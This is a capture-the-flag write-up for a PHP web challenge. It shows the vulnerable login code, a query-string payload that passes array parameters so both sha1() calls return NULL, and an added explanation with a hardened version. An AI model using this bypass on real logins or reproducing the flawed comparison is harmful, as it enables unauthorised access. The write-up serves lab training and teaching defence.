Shiyanbar - web - FALSE

Copyright notice: a3uRa QQ:962620891 github:asuralinmo.github.io https://blog.csdn.net/qq_41173457/article/details/81546231

<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
    // Loose comparison: only rejects values that PHP considers equal
    if ($_GET['name'] == $_GET['password'])
        echo '<p>Your password can not be your name!</p>';
    // Strict comparison of the two SHA-1 results
    else if (sha1($_GET['name']) === sha1($_GET['password']))
        die('Flag: '.$flag);
    else
        echo '<p>Invalid password.</p>';
}
else {
    echo '<p>Login first!</p>';
}
?>

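First, enter some arbitrary values to see what happens: http://ctf5.shiyanbar.com/web/false.php?name=11&password=1111
The check can be bypassed with arrays.
An arbitrary payload: http://ctf5.shiyanbar.com/web/false.php?name[]=&password[]=f
As for how it works, look it up on Baidu or Google; it is simple.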
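
Why the array payload passes, as an added example that is not part of the original post: PHP turns `name[]=` into an array, the two arrays differ so `==` is false, and on PHP before 8 `sha1()` of an array warns and returns NULL, so `NULL === NULL` is true. The function names `vulnerable_check` and `hardened_check` are hypothetical, and the sample query strings are constructed from the two URLs above.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// Same comparison logic as the challenge, with the outcome returned as a label.
function vulnerable_check($name, $password): string
{
    if ($name == $password) {
        return 'same';
    }
    try {
        // PHP < 8: sha1(array) warns and returns NULL, so NULL === NULL is true.
        // PHP >= 8: sha1(array) throws TypeError instead of returning NULL.
        return @sha1($name) === @sha1($password) ? 'flag' : 'invalid';
    } catch (TypeError $e) {
        return 'type-error';
    }
}

// Mitigation: accept only strings before comparing or hashing.
function hardened_check($name, $password): string
{
    if (!is_string($name) || !is_string($password)) {
        return 'bad-input';
    }
    // Strict comparison, so numeric-looking strings are not juggled.
    if ($name === $password) {
        return 'same';
    }
    return hash_equals(sha1($name), sha1($password)) ? 'flag' : 'invalid';
}

// Constructed sample query strings, parsed the way PHP fills $_GET.
$samples = ['name=11&password=1111', 'name[]=&password[]=f'];
foreach ($samples as $query) {
    parse_str($query, $get);
    printf(
        "%-24s vulnerable=%-10s hardened=%s\n",
        $query,
        vulnerable_check($get['name'], $get['password']),
        hardened_check($get['name'], $get['password'])
    );
}
```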
